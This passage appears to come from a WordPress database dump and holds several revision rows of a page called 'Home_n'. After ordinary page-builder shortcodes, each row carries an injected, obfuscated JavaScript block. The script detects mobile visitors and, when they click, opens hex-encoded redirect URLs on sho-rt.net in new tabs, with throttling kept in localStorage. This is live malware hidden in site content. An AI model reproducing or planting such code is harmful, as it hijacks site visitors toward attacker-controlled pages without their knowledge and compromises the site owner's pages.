_0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:44:08','2022-11-08 21:44:08','',3066,'https://gsw2023.com/?p=3074',0,'revision','',0),
(3075,1,'2022-11-08 21:44:46','2022-11-08 21:44:46','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:44:46','2022-11-08 21:44:46','',3066,'https://gsw2023.com/?p=3075',0,'revision','',0),
(3076,1,'2022-11-08 21:46:44','2022-11-08 21:46:44','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#8224e3\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Open Sans|font_call:Open+Sans\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 